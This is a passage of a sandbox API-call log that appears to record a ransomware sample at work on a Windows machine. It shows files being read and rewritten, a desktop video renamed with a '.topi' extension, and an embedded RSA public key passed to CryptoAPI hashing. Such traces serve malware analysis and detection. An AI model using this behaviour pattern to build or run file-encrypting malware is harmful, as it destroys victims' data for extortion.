(HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3d18 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3d60 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.628] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9150 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9138 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.629] GetCurrentThreadId () returned 0x8c4 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1e50 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.630] GetCurrentThreadId () returned 0x8c4 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9168 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.632] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3d60 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.633] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x9811, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x9811, lpOverlapped=0x0) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.633] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9816, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.633] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.633] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.633] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.634] CloseHandle (hObject=0x6a8) returned 1 [0094.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.643] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\quat5yQtAQx60X5AadT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quat5yqtaqx60x5aadt.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\quat5yQtAQx60X5AadT.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quat5yqtaqx60x5aadt.mp4.topi")) returned 1 [0094.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.643] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.645] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87c64720, ftCreationTime.dwHighDateTime=0x1d5bca2, ftLastAccessTime.dwLowDateTime=0xe6c4c030, ftLastAccessTime.dwHighDateTime=0x1d5bb1c, ftLastWriteTime.dwLowDateTime=0xe6c4c030, ftLastWriteTime.dwHighDateTime=0x1d5bb1c, nFileSizeHigh=0x0, nFileSizeLow=0xa9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ThK4acWZ27MnszTc2.pptx", cAlternateFileName="THK4AC~1.PPT")) returned 1 [0094.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.645] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThK4acWZ27MnszTc2.pptx") returned=".pptx" [0094.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThK4acWZ27MnszTc2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thk4acwz27mnsztc2.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.645] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=2716) returned 1 [0094.645] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.648] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.648] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.648] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.648] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.648] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.649] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xa9c, lpOverlapped=0x0) returned 1 [0094.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.649] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.649] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.650] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.650] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.650] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.650] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.650] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.650] GetLastError () returned 0x0 [0094.650] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.650] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.650] UuidCreate (in: Uuid=0x9ccfa48 | out: 